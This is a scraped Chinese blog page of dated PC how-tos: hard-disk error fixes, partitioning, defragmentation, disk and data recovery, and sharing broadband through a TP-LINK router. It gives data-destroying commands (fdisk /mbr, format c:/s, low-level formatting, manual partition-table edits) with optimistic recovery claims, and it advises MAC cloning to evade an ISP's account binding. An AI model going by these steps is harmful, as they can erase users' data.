\n'); } function setFlash(){ var myFlshObj = document.myFlash; var photoAlbum=document.getElementById('photoAlbum'); if(photoAlbum&&myFlshObj){ var awidth=0; awidth=parseInt(photoAlbum.offsetWidth); if(awidth<260) myFlshObj.height='150px'; if(awidth>=260 && awidth<350) myFlshObj.height='240px'; if(awidth>=350 && awidth<370) myFlshObj.height='305px'; if(awidth>=370 && awidth<550) myFlshObj.height='320px'; if(awidth>=550 && awidth<730) myFlshObj.height='455px'; if(awidth>=730) myFlshObj.height='590px'; } } function setAlbumUrl(name){ albumTypename=name; setFlash(); myFlash_DoFSCommand(null,"test"); } function showLoginWindow(ev){ var obj = document.getElementById("pop-login"); if(document.all){ obj.style.top = ev.clientY +'px'; obj.style.left = ev.clientX - 272 +'px'; } else{ obj.style.top = ev.pageY +'px'; obj.style.left = ev.pageX - 272 +'px' } obj.style.display ="block"; document.getElementById("pop-user-name").focus(); } function hideLoginWindow(){ document.getElementById("pop-login").style.display ="none"; } var blogID=getBlogID(); var UserName = ""; if(blogID!=null){ var tmpUserName=blogID.split("."); UserName=tmpUserName[0]; } function resize(obj){ if(window.event.srcElement.tagName == 'A'){ return; } obj.parentNode.childNodes[1].style.display = obj.parentNode.childNodes[1].style.display=='none' ? 'block': 'none'; obj.parentNode.childNodes[2].style.display = obj.parentNode.childNodes[2].style.display=='none' ? 'block': 'none'; } function tab(event){ var evt = (document.all)?window.event:event; if(evt.keyCode == 9){ document.getElementById("pop-password").focus(); return false; } else{ return evt.keyCode; } } function tab1(event){ var evt = (document.all)?window.event:event; if(evt.keyCode == 9){ document.getElementById("save").focus(); return false; } else{ return evt.keyCode; } } function tabTrack(event) { var evt = (document.all)?window.event:event; if(evt.keyCode == 9){ document.getElementById("pop-password-track").focus(); return false; } else{ return evt.keyCode; } }
Myblog
最新访客
日历
统计
统计中,请等候...
统计中,请等候...
日志
硬盘的常见错误提示及解决方法
一、显示:“c:drive failure run setup utility,press(f1)to resume”
此类故障是硬盘参数设置不正确所以从软盘引导硬盘可用,只要重新设置 硬盘参数即可。
二、显示:“no rom basic,system halted”
病因分析:造成该故障的原因一般是引导程序损坏或被病毒感染,或是分区表中无自举标志,或是结束标志55aah被改写。
治疗方法:从软盘启动,执行命令“fdisk/mbr"即可。fdisk中包含有主引导程序代码和结束标志55aah,用上述命令可使fdisk中正确的主引导程序和结束标志覆盖硬盘上的主引导程序,这一招对于修复主引导程序和结束标志55aah损坏既快又灵。对于分区表中无自举标志的故障,可用ndd迅速恢复。
三、显示“error loading operating system”或“missing operating system”
病因分析:造成该故障的原因一般是dos引导记录出现错误。dos引导记录位于逻辑0扇区,是由高级格式化命令format生成的。主引导程序在检查分区表正确之后,根据分区表中指出的dos分区的起始地址,读dos引导记录,若连续读五次都失败,则给出“error loading opearting system”的错误提示,若能正确读出dos引导记录,主引导程序则会将dos引导记录送入内存0:7c00h处,然后检查dos引导记录的最后两个字节是否为55aah,若不是这两个字节,则给出“missing operation system”的提示。
治疗方法:一般情况下用ndd修复即可。若不成功,只好用format c:/s命令重写dos引导记录,也许你会认为格式化后c盘数据将丢失,其实不必担心,数据仍然保存在硬盘上,格式化c盘后可用nu8.0中的unformat恢复。如果曾经用dos命令中的mirror或nu8.0中的image程序给硬盘建立过image镜像文件,硬盘可完全恢复,否则硬盘根目录下的文件全部丢失,根目录下的第一级子目录名被更名为dir0、dir1、 dir2……,但一级子目录下的文件及其下级子目录完好无损,至于根目录下丢失的文件,你可用nu8.0中的unerase再去恢复即可。
四、显示:“invalid drive specification”
治疗方法:
1、重新分区格式化。
2、如0磁道损坏需要低级格式化,然后用set comspec(指定command文件位置),使得command远离0磁道。
当硬盘出现分区故障后,希望用户先用上述方法解决,若不成功,对硬盘分区格式化是解决软故障的基本方法,但信息将被清除。
其使用原则是:能用高格解决的不用分区,能用分区解决的不用低级格式化
高级分区技巧
在讲解高级分区技巧之前,我们有必要先来了解一下簇的概念。
文件系统是操作系统的重要组成部分,现在我们常用的windows操作系统都可以支持多种文件系统,例如fat16、fat32以及ntfs文件系统等。文件系统是操作系统与驱动器之间的一个接口,当操作系统请求从硬盘里读取一个文件时,会请求相应的文件系统(fat16、fat32、ntfs)打开文件,而簇的概念也在此时出现。虽然我们知道扇区是磁盘最小的物理存储单元,但对于dos操作系统来说,扇区要小得多(仅仅512个字节),dos无法对数目众多的扇区进行寻址。根据dos的设计初衷,dos只能处理216个磁盘单元,而磁盘单元可以是扇区,也可以是由扇区集合所构成的簇。所以当使用fat16格式时,扇区必须组成“簇”的形式,每个簇可以包括2、4、8、16、32或者是64个扇区。簇是操作系统所使用的逻辑概念,而非磁盘的物理特性。簇的大小直接影响硬盘分区表的大小,虽然簇变大之后能够管理更多磁盘空间,并且能加快读写速度,提高数据寻道时间,但由于分区表体积的增大以及簇容量的变大,也会导致磁盘空间的浪费。
举例来说,一个只有一字节的文件,在一个每簇为2kb的分区上,要占用2k字节磁盘空间;如果在每簇为16kb的分区上,则这一个字节的文件要占用16kb空间。从文件末尾到该文件簇末尾的空间称为簇悬置空间,积累的簇悬置空间越大,磁盘浪费的空间也越大。
这时,我们就需要找到一个即能考虑性能也能兼顾容量的分区方法。通常这样的方法被称为按簇分区,而要想如此操作则需要第三方分区软件的支持,比如pqmagic(分区魔术师),就是最常见的一款。
从pqmagic的分析图中我们不难看出,对于一个装有数据的分区来说,过大的簇会造成磁盘空间的浪费。
通常情况下,对于8gb以下的分区容量,把簇的大小设置为8kb即可获得性能与容量的平衡。如果想要最大限度地利用硬盘空间,就需要按照使用用途来进行按簇分区。例如,如果分区为8g,并且分区为引导分区,那么把簇设置成8kb将比把簇设置成16kb更能节约磁盘空间。因为引导分区经常需要进行数据读写,而这些数据通常都非常多而小,使用大的簇将非常浪费磁盘空间,并且也不利于数据的寻址。但如果这个分区是逻辑分区,并且只存储一些大容量的视频文件,就没有必要把簇的值设定得太低,这样反而不利于读写。我们不难看出,过大的簇会造成磁盘空间的浪费。
另外,也不能把容量非常大的分区的簇设定得太小,这样不仅影响读写速度,并且还容易产生文件碎片。
硬盘的日常维护与整理
我们在日常使用电脑的过程中,经常会删除、拷贝大量的文件,这会导致我们的硬盘产生大量碎片,一个个完整的文件就“四分五裂”地保存在磁盘中的各个角落,影响了电脑查找与执行文件的速度。因此,我们有必要定期进行磁盘整理。
首先,我们可以通过windows自带的磁盘碎片整理程序来完成这项工作,把文件连续排列,这样能大大提高磁盘读写速度。windows自带的磁盘碎片整理程序包括两部分功能,一是碎片整理,二是启动项目优化。虽然这两个功能非常实用,但由于整理的时间太过漫长,并且经常对硬盘进行长时间磁盘整理会减少硬盘寿命,所以我们建议使用专用的磁盘整理软件,在此推荐voptxp和norton磁盘工具中的speed disk这两款软件。
磁盘整理软件voptxp
启动该软件,出现其主界面。软件默认从c盘开始整理,如果您需要整理其他硬盘,也可以在此按下下三角形的按钮,选择其他盘符。通过分析,我们看出,磁盘上有很多碎片,这无疑会影响磁盘的运行速度。
在“tools”菜单中选择“error checking”,调用windows自带的磁盘纠错程序检测磁盘,这样可以避免硬盘存在目录结构错误,影响磁盘整理的速度和效果。检查完错误之后,我们就可以进行磁盘碎片的整理了。
点击窗口中的,开始整理磁盘,这一过程通常耗时较长,请耐心等候。整理完毕后,我们看到,文件的排列更加连续,中间没有碎片。现在,硬盘的读写速度会相应提升。整理之后,磁盘的碎片明显减少。
norton磁盘工具speed disk
norton systemwoks 2003中提供了speed disk这个整理磁盘碎片的软件,它能够将磁盘按照不同的文件类型进行重新排列,被系统经常读取的文件会放在硬盘的最外圈磁道上,来提高硬盘对它们的读取速度。norton systemwork2003种提供的speed disk,可以对磁盘碎片进行非常有效的整理。
在norton磁盘工具中选择speeddisk项目。在该软件的主界面中,左侧为四个主功能按钮。它们依次是硬盘优化图表、硬盘分区分析、硬盘分区选项和定时设置。在进行优化之前,我们可以先选择第二项来分析一下硬盘上的数据内容,查看是否硬盘碎片过多需要整理。在点击“start analyzing”以后,硬盘开始分析所选分区中数据的类型,随后得出结论。我们看到,碎片文件占整个分区数据总量的8.4%,一般来说,小于10%的碎片都不必进行整理。对磁盘进行分析,发现碎片文件只占整个分区数据总量的8.4%。
如果用户要进行磁盘碎片的整理,那么再按下“optimization map”里的“start optimazing”按钮就可以开始了。这是个非常耗费时间的过程,不过比起windows自带的磁盘碎片整理程序来说要快不少。程序默认整理的是c盘,如果用户还要对其他分区进行碎片整理,继续选择其他分区再依次重复上面的各个步骤就可以了。经过整理之后,磁盘碎片明显减少,而且文件的排列也更加紧密。
硬盘数据的拯救
使用计算机很多年,难免磕磕碰碰,造成了一些安全隐患,系统文件丢失,或者数据损坏,都可能是磁盘坏道造成的。硬盘坏道包括软坏道与硬坏道,前者可以通过特定软件来进行修复,并可以继续使用,而后者则是真正物理意义上的损坏,轻则损失一定的磁盘空间,重则硬盘无药可救,彻底报废。
修复硬盘的软/硬坏道
修复软坏道的方法很简单,windows自带的磁盘修复工具或者高级格式化就能够很好处理这类问题。而对于硬坏道,我们可以使用lf等软件,通过对硬盘进行低级格式化的方法试图修复。
运行lf,选择驱动器id,对硬盘进行低级格式化。所谓低级格式化,就是将空白的磁盘划分出柱面和磁道,再将磁道划分为若干个扇区,每个扇区又划分出标识部分id、间隔区gap和数据区data等。低级格式化只能在dos环境下完成,而且只能针对一块硬盘而不能支持单独的某一个分区。低级格式化是一种对硬盘的损耗性操作,对硬盘寿命有一定的负面影响。因此,许多硬盘厂商均建议用户不到万不得已,不要使用低级格式化来格式硬盘。有些坏磁道和坏扇区能够通过低级格式化来修复,但对于真正的硬盘磁盘表面物理划伤则无法进行修复,这只有通过普通的format高级格式化来标出坏扇区的位置,以便让操作系统不去使用。物理坏道可能会随磁头的读写而渐渐扩大,导致坏道越来越多,最后达到无法使用的情况,因此建议硬盘在出现了坏道以后要及时备份硬盘上的重要数据。
在dos下运行lf,可以对磁盘进行低级格式化,修复磁盘的软坏道。具有图形化界面的lformat,也可以对磁盘进行低级格式化。
零磁道的修复
硬盘的主引导记录区(mbr)在零磁道上,位于硬盘的0磁道0柱面1扇区,其中存放着硬盘主引导程序和硬盘分区表。在总共512字节的硬盘主引导记录扇区中,446字节属于硬盘主引导程序,64字节属于硬盘分区表(dpt),两个字节(55 aa)属于分区结束标志。零磁道一旦受损,将使硬盘的主引导程序和分区表信息遭到严重破坏,从而导致硬盘无法引导。
通常的维修方法是通过pctools9.0(或者其他类似的可以对磁盘扇区进行编辑的工具)的de(磁盘编辑器)来修复,其原理是使零磁道偏转一个磁道,占用1磁道。
用windows 9x启动盘启动,运行pctools目录下的de.exe,先进入“options”菜单,选择“configuration”(配置)命令,去掉read only(只读)前的勾,然后保存退出。
接着选择主菜单“select”(选择)中的drive(驱动器),进去后在“drive type”(驱动器类型)项中选择physical(物理的),再切换到“drives”项,选中“hard disk”(硬盘),最后选择“ok”并回车。
之后,回到主菜单中,打开“select”菜单,这时会出现partition table(分区表),选中并进入,出现硬盘分区表信息。如果硬盘有两个分区,1分区就是c盘,该分区是从硬盘的0柱面开始的。那么,将1分区的beginning cylinder(起始柱面)的0改成1就可以了。保存后退出。
重新启动,进入cmos设置,选择“ide auto detect”,可以看到cyls(磁道)数比原来减少了1,保存设置并退出。重新分区、格式化,即可救活硬盘。
需要注意的是,de工具仅对fat16格式的硬盘有效,对于fat32分区的硬盘则需要先通过分区大师等磁盘工具,将其转换为fat16格式,然后再对其进行修改。
修复损坏的分区表
硬盘分区之后,为了安全起见,最好将分区表进行备份,以便一旦分区表被损坏,可以很方便地进行恢复。这方面,国内著名的杀毒软件kv3000和瑞星系列都提供了完整的解决方案。而对于没有备份分区表的硬盘,虽然kv3000也提供了相应的修复方法,不过成功率相对较低。
大名鼎鼎的诺顿磁盘医生(ndd),是一款用来修复硬盘分区表的非常有效的工具,可以自动修复分区丢失等情况。当硬盘崩溃以后,用含有dos系统的软盘引导系统,然后运行ndd,选择“diagnose”进行诊断。ndd会对硬盘进行全面扫描,如果有错误,它会提示。您只要根据这些提示选择修复,就可以非常轻松地解决这些问题。在windows 9x下,还有ndd32,它的图形化界面会让您事半功倍。
功能强大的easyrecovery,可以最大限度地恢复删除的硬盘数据。
另外,中文磁盘工具diskman在这方面也是行家里手。重建分区表作为它的一个非常实用的功能,非常适合用来修复损坏的分区表。
对于硬盘分区表被破坏的系统,使用diskman可通过未被破坏的分区引导记录信息重新建立分区表。在菜单的工具栏中选择“重建分区表”,diskman即开始搜索并重建分区。
diskman将首先搜索0柱面0磁头从2扇区开始的隐含扇区,寻找被挪动过的分区表,然后搜索每个磁头的第一个扇区。搜索过程分为“自动”和“交互”两种方式。自动方式保留发现的每一个分区,适用于大多数情况。交互方式对发现的每一个分区都给出提示,由用户选择是否保留。当自动方式重建的分区表不正确时,可以采用交互方式重新搜索。不过,重建分区表功能不能做到百分之百地修复成功。
硬盘数据的硬件保护
说到硬件保护,自然要先提到硬盘保护卡。硬盘保护卡又称为硬盘还原卡,是彻底解决计算机数据保护问题的最佳方案。它从硬件的层面上对硬盘中的数据进行保护和恢复,可以瞬间恢复各种有意或无意导致的数据丢失。硬盘保护卡利用硬盘介质的冗余性(即每块硬盘都不能用尽所有的硬盘空间),使每块硬盘中的所有自由空间都自动成为自己的缓冲区,因此不必占用固定的硬盘空间。而且,使用硬盘保护卡后,在大多数情况下,即使用户对硬盘执行了fdisk和format命令,或者其他软件层面的破坏,甚至包括病毒对硬盘数据的破坏,只要重新启动并按下特定的热键,短短几秒钟内硬盘数据就会恢复到最近一次存档时的状态,其速度是所有软件恢复方法都无法与之比拟的。再有,硬盘还原卡的安装使用极其简单,高度智能化,甚至连安装软盘都可以不要,真正的即插即用。安装后,所有的用户界面和操作与安装前毫无二致,用户根本不会感觉到还原卡的存在。
硬盘还原卡不仅可以保护硬盘数据免遭各种破坏,而且也可以保护cmos参数和主板bios数据免遭各种病毒的恶意破坏,即使是大名鼎鼎的cih病毒对之也无可奈何,真正实现了对
电脑数据的全方位保护。
常见的硬盘保护卡有三茗的电脑卫士,以及看门狗智能型系统复原卡等。
通过主板来实现对硬盘数据的保护
现在,很多主板都提供了对硬盘数据的保护功能,例如捷波的“数据恢复精灵”和联想qdi的“宙斯盾保护系统”。
宙斯盾(recoveryeasy)是联想qdi主板的硬盘数据保护技术。使用该技术的主板可以备份、保护并且立即恢复硬盘资料,防止重要资料丢失。此外,宙斯盾还能保护和恢复cmos中的数据。因为宙斯盾是建在bios中的,只要计算机进入bios启动后,就可以立即进入宙斯盾界面,极为简单、易用。
硬盘数据的恢复
我们知道,当您执行了删除命令后,计算机只是将该文件目录项第0个字节改为e5,并将文件所占簇号在文件分区表中的登记项清零,表示释放空间。格式化时,计算机也只是将根目录区清零。这意味着删除与格式化操作只是在文件名或根目录区上做了一些手脚,文件数据本身丝毫未动,这样,就给文件恢复提供了可能。利用一些反删除软件,可以轻松地恢复删除的数据。只要没有用fdisk命令打乱分区,要恢复的文件所占用的簇不被其他文件占用,大部分数据都是可以被恢复的。
如果您的windows系统可正常使用,最简单的恢复方法就是用windows版easyrecovery,它恢复硬盘数据的功能十分强大,不仅能恢复从回收站清除的文件,而且还能恢复被格式化的fat16、fat32或ntfs分区中的文件。
该软件的使用方法十分简单,运行easyrecovery,出现主界面。它的左侧包括4个功能按钮以及两个软件支持按钮。点击“数据恢复”按钮,我们可以看出easyrecovery professional提供了多种数据恢复选项。其中包括:使用高级选项自定义数据恢复功能、查找并恢复已删除文件、从一个已格式化的卷中恢复文件、不依赖任何文件系统结构信息进行恢复等。此软件还可以保存恢复数据进度以及创建可引导的紧急引导软盘。
easyrecovery提供了多达6种数据修复模式,从各种途径恢复丢失的硬盘数据。对磁盘进行扫描,以找出丢失的数据。选择要恢复的文件,然后点击“应用”,就可以开始恢复了。
安装了norton unerase wizard之后,回收站上会出现一个蓝色的盾形图标,表示文件已经被保护。现在我们选择“使用高级选项自定义数据恢复功能”来进行数据恢复操作,经过扫描系统,会显示磁盘驱动器信息。我们在这里选择恢复资料的硬盘分区为c盘,此时easyrecovery professional将自动扫描分区,之后会把所有详细文件信息显示出来,其中包括目前还存在的和已经被删除的文件。之后,选择我们想要恢复的文件,然后点击“应用”就可以开始恢复了。除了easyrecover外,这种软件还有很多,如revival、recover等,它们在关键的时候均可用来救急。
如果用户在丢失资料之前已经安装过norton utilities或者norton unerase wizard的话,资料的恢复将易如翻掌。安装完norton unerase wizard之后,回收站上会出现一个蓝色盾牌图标。此时,如果我们删除了一个文本文件并且清空了回收站,使用norton unerase wizard就可以轻松地恢复该文件。双击回收站图标,对已经删除的文件进行搜索,从列表中可以看到已经删除了的文件,选择该文件后点击recover就可以恢复了。安装完norton unerase wizard后,回收站上会出现一个蓝色盾牌图标。
norton utilities提供了强大的磁盘文件修复功能。norton utilities中提供的三种不同的文件恢复模式。或者,我们也可打开norton utilities主界面的find and fix problems中的unerase wizard选项,这里提供了三种不同的恢复方法。分别为寻找已删除文件、在特定分区中寻找所有被保护文件以及通过文件打开类型查找要恢复的文件。通过文件类型恢复被删除的文件。
一般情况下,所丢失的大部分文件都可以通过上面的方法恢复。但有时您会发现,使用上面介绍的工具仍然不能找到丢失的文件,这是什么原因呢?前文已经说过,磁盘空间是以簇为单位进行分配的。磁盘簇是文件系统进行分配、释放、读出的最小空间单位,即使只有一个字节的文件也要占用整整一个簇的磁盘存储空间。当我们把文件写人磁盘时,文件即在磁盘上占用一定数量的簇,从磁盘上把文件删除后,磁盘就释放出一定数量的簇。这时若进行恢复删除的操作,则文件被恢复的可能性最大。如果在删除文件之后又对磁盘进行了写操作,那么新文件有可能会覆盖被删除文件原先所占据的簇,则该文件就不能成功地被恢复了。
降低硬盘噪音
很多硬盘厂家都提供了一些高级硬盘应用软件,使专业用户可以更好地发挥硬盘的效能,比如迈拓的maxtor silent store技术就是其中之一。通过这个技术我们可以调节硬盘寻道的声音,以降低硬盘工作时产生的噪音。
基于该技术的软件叫做maxtor acoustic management,可以让您控制迈拓硬盘工作时的音量级。它按控制程度分为quiet和fast两个级别。如果您选择了quiet,那么磁盘将进入安静寻道模式,此时噪声明显减小,磁盘性能也大幅度下降;如果您选择了fast,那么磁盘将进入快速寻道模式,此时磁盘性能下降幅度相对较小,但噪音减低的程度也不如前者那么明显。acoustic management的主执行文件是amset.exe,它拥有四个命令参数:
amset.exe /quiet切入quiet模式;
amset.exe /fast切入fast模式;
amset.exe /off关闭降噪功能,此时硬盘性能最高但噪音最大;
amset.exe /check可以查看当前硬盘降噪功能的运作状态。
最后需要说明的是,您必须是diamondmax plus 40、diamondmax 60、diamondmax vl 30、diamondmax plus 40、d540x、d740x这几个系列的用户才能使用这些功能。利用maxtor silent store技术降低硬盘噪音
五、硬盘引导故障怎么处理?
有些朋友说,最怕的就是硬盘引导时有故障,面对一个黑乎乎的屏幕,不知道该如何处理。不用怕,看看下面的分析情况,也许你会发现处理问题的窍门哦。 高兴提示:在这几篇故障分析及处理的文章中,数硬盘引导故障最为棘手,也需要操作者具有一定的计算机知识和经验,如果你是一个计算机新手,高兴建议你先根据其他文章尝试修复一些简单的故障,以此来建立你的自信心,同时也积累实战经验,最后再学习如何修复硬盘引导故障。硬盘引导时的故障一般有如下几种情况:电脑黑屏;电脑自检完毕后不引导操作系统,报告无效的磁盘或者没有找到操作系统。
电脑黑屏
分析:黑屏故障可分为主机原因引起的黑屏和显示器自身故障引起的黑屏两类,而主机引起的故障又分为系统启动时的黑屏故障和系统运行中的黑屏故障两类,总体说来黑屏故障的原因比较复杂。
解决方法:
读者请看2001年第24期步步高栏目的《被“黑”了,怎么办?》一文,此篇文章分析原因透彻,解决方案也非常详细清晰。
电脑自检完毕后不引导操作系统
分析:出现这种现象有几个可能:系统被病毒感染或者病毒发作破坏了启动数据;没有设置正确的活动分区;引导记录被破坏。
解决方法:
1.查看是否被病毒感染:首先用干净的启动盘启动系统(启动盘的制作可参看前文),检查硬盘是否感染了病毒,并清除病毒,一般情况下即可修复故障。
2.检查磁盘是否出错:将根据前文所制作的救命软盘放入软驱,运行scandisk程序扫描磁盘并自动修正错误,可以使用下面的命令:scandisk /all /autofix。(请注意:不要用windows 98/me带的scandisk扫描windows nt/2000/xp所在的分区)
3.查看活动分区的设立是否有误,运行fdisk,查看是否设置了正确的启动分区标志。(请读者参看2001年第12期的步步高栏目第58页的文章)
4.将根据前文所备份的引导记录恢复。
计算机找不到硬盘
分析:计算机从硬盘引导前,必须要找到硬盘,如果硬盘出现了问题,则硬盘不能响应系统的请求。
解决方法:硬盘出现问题可分为两种:
一是硬盘不工作了,则你需要考虑是否为电源线松动或者硬盘损坏等原因。
二是硬盘在工作,则要检查数据线连接和计算机设置中的错误配置等原因。读者可参看2001年第19期杂志步步高栏目《拯救硬盘数据灌水》一文。系统在出现starting windows信息前出现错误信息
分析:
一般情况下是系统找不到重要的引导文件,或者这个文件已经被破坏。
解决方法:
记下启动时报告丢失的文件名,以windows 98为例,我们经常会看?
随着互联网的日益普及,很多的家庭已经或计划加入这个自由、随意的新媒体,享受技术的发展带内的便利和新鲜。但是相对于国内普通工薪族的收入水平,现在的上网费用可以说一点都不便宜;尤其是有些家庭拥有一台以上的电脑,很难想象有人会为家中的每一台电脑分别申请一个上网帐号。因此使用路由器共享一个帐号上网的现象越来越多,多个用户分摊一份上网费用无疑减轻了一些经济压力,多台电脑使用一条线路,一个账号上网也方便了家庭和小企业。
以下说明假设已经有一台电脑连接上互联网(以下简称“主机”,并已经正确设置,能正常上网。
一 安装前的准备工作
安装前应该准备好以下设备或物品:
1.宽带路由器一台;
2.五类或超五类双绞线若干米,视实际情况而定,有多少台电脑就要分成多少段;
3.水晶头,个数 = 连入电脑台数 × 2;
4.压线钳
5.能有网线测试仪当然就更好了,没有也不要紧。
说明:
如果条件有限,可以先估计好每段网线的长度,留出足够的余量,然后请专业人员制作好水晶头(全都是直通线,两头都是586B型接头)。
如果是通过电话线拨号上网,那么你应该已经有并连接好了调制解调器(MODEM)。如果你的MODEM具备路由功能,那么本文说的宽带路由器可以用交换机代替(便宜几十块钱),相应的设置也改为在MODEM上进行。
设备、材料的选用:
1.路由器:
既然是使用宽带路由器共享上网,那么宽带路由器当然是不可缺少的关键设备。目前生产宽带路由器的厂家很多,国产的TP-LINK(普联)稳定性和性能不错,价格也不贵,使用很普遍,其他的品牌还有:D-LINK,TENDA(腾达),阿尔卡特等,选择的余地还是很大的。由于宽带路由器对性能的要求并不很高,技术也很成熟,各家的产品相差都不大。因此选购时主要还是看产品的稳定性,外观和价格。

图1 TP-LINK TL-R402M SOHO宽带路由器
图2 TP-LINK TL-R402 SOHO宽带路由器

图3 D-LINK DL-504宽带路由器
以下的说明都以TP-LINK TL-402系列为例,其它产品设置与此大同小异,可具体参考说明书。
2.网线:
家庭和小型办公室组网通常使用五类或超五类双绞线,最大传输速度可以达到100Mb/s。这种线缆共有八根线,组成四对,每对中的两根线以一定规格相互缠绕,每对线之间也互相缠绕,以降低线间串扰,提高传输性能。购买时不要贪图便宜而选择不合规格的线缆,总共也值不了几个钱,零售每米大慨1块左右。

图4 五类非屏蔽双绞线
3.水晶头:

图5 RJ-45水晶头
二 布线,连接设备
准备工作做好后,就可以开始工作了。
第一步 确定路由器的放置地点,一般就把它放置在主机处,这样就免去了重新布设进户线(原来宽带提供商到主机的那条线)的麻烦;
第二步 分别从每台电脑拉一条网线到宽带路由器所在位置,并做好水晶头,请适当流出余量。水晶头的做法请参考图6,一般采用586B型接法;

图6 水晶头的两种接法
第三步 如图7所示连接各条网线到相应的电脑或路由器;

图7 使用宽带路由器共享上网
各个接口具体的位置请参考产品说明书,图中只是示意画法。
总结一下其实很简单:把各台电脑与宽带路由器的局域网接口相连,而将原来连接主机网卡的网线改接到宽带路由器的广域网端口,其他的一概不变。
三 电脑的设置
电脑的设置工作与布线其实并没有先后关系,可以根据你的实际情况或先或后,或同时进行。
打开“控制面板”——“网络连接”,在网卡名称(或显示为本地连接**)上单击右键,选择“属性”,弹出如图8所示窗口:
图8
请如图9设置每台电脑的IP地址,如果你的宽带路由器不提供DHCP服务或默认没有开启这项功能(具体情况请参考产品说明书),又或者你知道如何手工设置IP地址,那么你也可以选中“使用下面的IP地址”和“自动获得DNS服务器地址”,如图10,请注意这里填写的IP地址应该与路由器的默认IP地址处于同一网段(前三节应该一致)又不能与之相同,默认网关设置为路由器的默认IP地址,子网掩码使用系统自动填写的值即可。
图9 自动设置IP地址
图10 手工设置IP地址
四 路由器的设置
要实现共享上网的基本功能,只需在宽带路由器进行几步简单的设置。请尽可能在“主机”上进行,这会给后面的工作带来一些方便。
1. 连接宽带路由器 打开浏览器,在地址栏中输入192.168.1.1(TP-LINK宽带路由器的默认ip地址,其他品牌的默认地址请参考说明书),打开宽带路由器的登录界面,如图11:
图11 宽带路由器登录界面
在登录对话框中填入初始用户名和登陆密码(说明书中有),TP-LINK系列的初始用户名和密码都是“admin”。点击确定即可显示宽带路由器的web设置界面。第一次访问会弹出设置向导,跟随向导并参考下面的介绍,也可以取消向导直接按照下面的介绍做;
2. 设置上网方式
点击web界面左侧菜单栏中的网络参数,并选择“WAN口设置”,右侧将显示图12所示内容
宽带路由器会提供几种与ISP(internet服务提供商)连接的方式,
动态IP——适用于通过以太网连入internet并从ISP处动态获取公网IP地址的用户;
静态IP——适用于通过以太网连入internet并使用ISP分配的固定的公网IP地址的用户;
PPPoE——适用于通过PPPoE虚拟拨号连入internet并从ISP处动态获取公网IP地址的用户,这也是最普遍的上网方式。
如果不明白自己属于哪一类,可以向ISP咨询,之前不妨先尝试一下PPPoE。以下的介绍都以PPPoE为例。
3. 设置上网帐号和密码
图12 设置帐号和密码
设置好后别忘了保存,现在点击下部的“连接”试一下,稍等片刻,如果“连接”变灰,“断线”变亮,那么恭喜你,拨号已经成功,你可以上网了。否则请检查你的帐号和密码,如果确认没错,那么说明ISP已经把你的帐号和网卡MAC地址绑定了。这时你可以拨打服务电话,告知他们你换了网卡,要求松绑,最好别说你接了宽带路由器;也可以继续下面的步骤。
4. 设置广域网口MAC地址
这是专为帐号和网卡MAC地址被绑定的用户设计的功能,请点击左侧菜单中的“MAC地址克隆”,
图13 克隆MAC地址
保存后重新启动宽带路由器,然后再次进入设置界面,点击“连接”即可。也有可能已经成功的自动拨号。
如何重新启动宽带路由器:最简单的办法就是抽掉它的电源插头再重新插上;也可以在左侧菜单中选择“系统工具”——“重启路由器”。
五 测试
到此为止,共享上网设置完成,连接到宽带路由器的各台电脑都应该能够正常上网,请注意,现在并不需要在电脑上拨号,不要多此一举,拨不成功的。
接下来,请在每一台电脑上测试一下上网功能,都没有问题后我们就大功告成了。注意:宽带路由器的电源得一直开着,否则所有电脑都将无法访问网络。
六 可能的故障
故障1:某台电脑无法连接宽带路由器,而其它电脑可以
解决:使用PING命令检测网络是否联通,PING 命令语法:PING 目标IP地址,参考下图:
图14 使用PING命令检测网络——正常
图15 使用PING命令检测网络——网络不通
如果结果如图14,说明网络是联通的,而这台电脑的ip地址没有正确,请设置按照前文,重新设置IP地址,子网掩码;
如果结果如图15,说明网络不通(有条件的话可以使用网络测试仪进行进一步的检测),请首先检查水晶头是否按照规定做好,线序是否正确,压制时是否到位,水晶头是否与网卡连接牢固,使用的线缆是否有质量问题,中间有无断裂。
故障2:所有电脑均不能连接宽带路由器
解决:请检查所有电脑的IP地址是否正确设置,是否改动过宽带路由器的局域网端口的默认IP地址,如果改动过,请使用新的IP地址连接宽带路由器。如果上述情况都已排除,那么这通常是宽带路由器引起的故障,要么是没有通电,要么宽带路由器死机或损坏。请检查宽带路由器的供电有无问题,如果供电正常,请尝试断电后重新启动一下,这样可以解决死机引起的故障,若问题任然存在,请调换宽带路由器。
故障3:所有电脑都能正常访问宽带路由器的web界面,但是无法连接internent
解决:请检查宽带路由器是否正确设置,帐号和密码有无错误,最要紧请检查宽带路由器的广域网端口的MAC地址是否正确设置。有没有设置防火墙,过滤规则等等有可能阻碍网络数据包通过的功能
七 高级应用
1.我希望某台电脑使用固定的ip地址
这可以通过手动设置网卡IP地址(注意不要与宽带路由器的DHCP地址池冲突)或使用宽带路由器的“静态地址分配“功能来实现
手动设置网卡ip地址前面已经说过,下面来看看如何通过宽带路由器来实现:
进入宽带路由器的web设置界面,选择左侧菜单的“DHCP服务器”——“静态地址分配”,出现图16所示画面:
图16 宽带路由器静态地址分配
点击“添加新条目”,在弹出的画面中设置好MAC地址和IP地址即可,可能需要重启宽带路由器才能生效。其中“MAC地址”指要使用固定ip地址的电脑网卡的MAC地址,如果不知道可以通过“IPCONFIG /ALL”命令查询,查询结果如图17
图17 用IPCONFIG命令查询MAC地址
有些地方要求MAC地址以“-”分隔,有些地方又要求以“:”分隔,也有些要求不能有任何分隔符,具体情况请具体对待,这里无法一一指明,反正这样不行就换一样,一个个的试验。
2.如何在使用PPStream等P2P软件时由内网变外网
连接宽带路由器web管理界面,在左侧菜单中选择“转发规则”——“虚拟服务器”,出现图16所示画面:
图18 设置虚拟服务器
图中各项的含义:
服务端口号:填写PPStream等软件使用的端口号,具体值请查看软件的设置选项或帮助文档,例如PPStream就可以在“选项”——“连接设置”中查看或设置,注意请选中“使用固定端口”。其他软件类似,自己摸索吧。
图19 更改PPStream的端口号
IP地址:填入你的电脑的ip地址,注意不是宽带路由器的那个公网ip地址,而是你网卡的私网地址。要想使用这项功能,你的电脑应该具有一个固定的ip地址(请参考高级应用1)。
协议:你的软件使用的协议,有TCP和UDP两种,不明白怎么填就选择“ALL”吧
状态:控制你刚刚设定的规则是否启用,当然是选择“生效”了
最后别忘了点击“保存”
这样设置后,你的P2P软件访问网络资源的速度将更快。
打开Firefox火狐狸浏览器,首先,在URL栏输入“about:config”, 将打开一个参数的命令行清单,这就是我们以下进行编辑的第一步。
